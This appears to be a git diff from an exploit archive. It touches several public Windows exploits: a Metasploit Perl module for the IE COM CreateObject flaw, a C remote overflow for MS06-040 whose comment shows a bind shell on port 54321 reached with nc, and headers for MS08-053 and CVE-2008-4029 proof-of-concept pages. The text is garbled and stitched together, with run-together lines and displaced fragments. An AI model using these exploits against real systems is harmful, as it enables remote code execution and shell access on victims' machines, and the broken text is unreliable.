Initializing...
- - -#; -} - -sub BuildResponse { - my ($self, $content, $type) = @_; - $type ||= 'text/plain'; - - my $response = - "HTTP/1.1 200 OK\r\n" . - "Content-Type: $type\r\n"; - - if ($self->GetVar('Gzip')) { - $response .= "Content-Encoding: gzip\r\n"; - $content = $self->Gzip($content); - } - if ($self->GetVar('Chunked')) { - $response .= "Transfer-Encoding: chunked\r\n"; - $content = $self->Chunk($content); - } else { - $response .= 'Content-Length: ' . length($content) . "\r\n" . - "Connection: close\r\n"; - } - - $response .= "\r\n" . $content; - - return $response; -} - -sub Chunk { - my ($self, $content) = @_; - - my $chunked; - while (length($content)) { - my $chunk = substr($content, 0, int(rand(10) + 1), ''); - $chunked .= sprintf('%x', length($chunk)) . "\r\n$chunk\r\n"; - } - $chunked .= "0\r\n\r\n"; - - return $chunked; -} - -sub Gzip { - my $self = shift; - my $data = shift; - my $comp = int(rand(5))+5; - - my($wtr, $rdr, $err); - - my $pid = open3($wtr, $rdr, $err, 'gzip', '-'.$comp, '-c', '--force'); - print $wtr $data; - close ($wtr); - local $/; - - return (<$rdr>); -} - -1; - -# milw0rm.com [2006-08-10] +## +# This file is part of the Metasploit Framework and may be redistributed +# according to the licenses defined in the Authors field below. In the +# case of an unknown or missing license, this file defaults to the same +# license as the core Framework (dual GPLv2 and Artistic). The latest +# version of the Framework can always be obtained from metasploit.com. +## + +package Msf::Exploit::ie_createobject; + +use strict; +use base "Msf::Exploit"; +use Pex::Text; +use IO::Socket::INET; +use IPC::Open3; + +my $advanced = + { + 'Gzip' => [1, 'Enable gzip content encoding'], + 'Chunked' => [1, 'Enable chunked transfer encoding'], + }; + +my $info = + { + 'Name' => 'Internet Explorer COM CreateObject Code Execution', + 'Version' => '$Revision: 3753 $', + 'Authors' => + [ + 'H D MooreInitializing...
+ + +#; +} + +sub BuildResponse { + my ($self, $content, $type) = @_; + $type ||= 'text/plain'; + + my $response = + "HTTP/1.1 200 OK\r\n" . + "Content-Type: $type\r\n"; + + if ($self->GetVar('Gzip')) { + $response .= "Content-Encoding: gzip\r\n"; + $content = $self->Gzip($content); + } + if ($self->GetVar('Chunked')) { + $response .= "Transfer-Encoding: chunked\r\n"; + $content = $self->Chunk($content); + } else { + $response .= 'Content-Length: ' . length($content) . "\r\n" . + "Connection: close\r\n"; + } + + $response .= "\r\n" . $content; + + return $response; +} + +sub Chunk { + my ($self, $content) = @_; + + my $chunked; + while (length($content)) { + my $chunk = substr($content, 0, int(rand(10) + 1), ''); + $chunked .= sprintf('%x', length($chunk)) . "\r\n$chunk\r\n"; + } + $chunked .= "0\r\n\r\n"; + + return $chunked; +} + +sub Gzip { + my $self = shift; + my $data = shift; + my $comp = int(rand(5))+5; + + my($wtr, $rdr, $err); + + my $pid = open3($wtr, $rdr, $err, 'gzip', '-'.$comp, '-c', '--force'); + print $wtr $data; + close ($wtr); + local $/; + + return (<$rdr>); +} + +1; + +# milw0rm.com [2006-08-10] diff --git a/platforms/windows/remote/2223.c b/platforms/windows/remote/2223.c index cff2a0478..6e9401959 100755 --- a/platforms/windows/remote/2223.c +++ b/platforms/windows/remote/2223.c @@ -1,591 +1,591 @@ -/* - -Microsoft Windows CanonicalizePathName() Remote Overflow MSO6-040 -More info: http://www.microsoft.com/technet/security/bulletin/MS06-040.mspx -Written by Preddy - -This is another version of hdm's metasploit version but ported to C, -Works against Windows XP SP1 -And it should give a crash on Win2k in services.exe - -On successfull exploitation it provides a remote shell at port 54321 -of your victim: - -./ms06 192.168.1.103 -Target: 192.168.1.103 -Attack Finished: now open a new terminal and nc to your victim on port 54321 -Warning: Don't close this window! - -[open a new terminal/window/prompt] - -nc 192.168.1.103 54321 -Microsoft Windows XP [Version 5.1.2600] -(C) Copyright 1985-2001 Microsoft Corp. - -C:\WINDOWS\system32> - -http://www.team-rootshell.com - -Greetz to all of my friends at: - -FREENODE(irc.freenode.net): ##c,##linux,##php,##security,##slackware,#fluxbox,#perl,#remote-exploit,#tor -MILW0RM(ABS.lcirc.net): #milw0rm -STS(irc.smashthestack.org): #lecture,#social (special greetz to: esper and crystal) -PTP(irc.eu.pulltheplug.org): #aso,#Social -GSO(gso.eclipticx.net): #gso-chat -TTNET(irc.ttnet.net.tr):#coders,#linux,#nukedx,#zion,#php -SSTNET(irc.0x557.net):#darpa,#exploits,#m00,#ph4nt0m,#rx.rx,#segfault,#sscan - -Rootshell Security Group and everyone else ^^ - -*/ - - -#include- - ============================================================================= - MS08-053 Windows Media Encoder wmex.dll ActiveX Control Buffer Overflow - ============================================================================= - - Calc execution POC Exploit for WinXP SP2 PRO English / IE6.0 SP2 - - Found by : Nguyen Minh Duc and Le Manh Tung - Advisory : http://www.microsoft.com/technet/security/Bulletin/MS08-053.mspx - - Exploit by : haluznik | haluznik- - -# milw0rm.com [2008-09-13] + +gmail.com - - 09.10.2008 - ============================================================================= - - - - - - -
+ + ============================================================================= + MS08-053 Windows Media Encoder wmex.dll ActiveX Control Buffer Overflow + ============================================================================= + + Calc execution POC Exploit for WinXP SP2 PRO English / IE6.0 SP2 + + Found by : Nguyen Minh Duc and Le Manh Tung + Advisory : http://www.microsoft.com/technet/security/Bulletin/MS08-053.mspx + + Exploit by : haluznik | haluznik+ + +# milw0rm.com [2008-09-13] diff --git a/platforms/windows/remote/7196.html b/platforms/windows/remote/7196.html index bed17da07..eff96c369 100755 --- a/platforms/windows/remote/7196.html +++ b/platforms/windows/remote/7196.html @@ -1,17 +1,17 @@ - - -KB955218 - CVE-2008-4029 - JA - - - - -# milw0rm.com [2008-11-23] + + +KB955218 - CVE-2008-4029 - JA + + + + +# milw0rm.com [2008-11-23]gmail.com + + 09.10.2008 + ============================================================================= + + + + + + +